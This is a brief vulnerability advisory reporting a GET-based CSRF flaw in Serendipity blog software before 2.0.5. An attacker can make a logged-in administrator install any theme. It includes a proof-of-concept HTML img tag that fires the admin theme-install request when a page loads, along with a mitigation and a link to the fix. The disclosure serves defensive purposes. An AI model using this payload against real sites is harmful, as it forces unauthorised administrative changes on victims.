Details
======
Software: s9y Serendipity
Version: <2.0.5
Homepage: https://docs.s9y.org/
=======
Description
================
Get type CSRF in Serendipity allows attacker installs any themes, no token here.
POC:
========
include this in the page ,then attack will occur:
<img src="http://127.0.0.1/serendipity/serendipity_admin.php?serendipity%5BadminModule%5D=templates&serendipity%5BadminAction%5D=install&serendipity%5Btheme%5D=bartleby&serendipity%5Bspartacus_fetch%5D=bartlebya>
Mitigations
=======
update to Serendipity v2.1.x
========
FIX:
==========
https://github.com/s9y/Serendipity/issues/452
Best regards,
Zhiyang Zeng of Tencent security platform department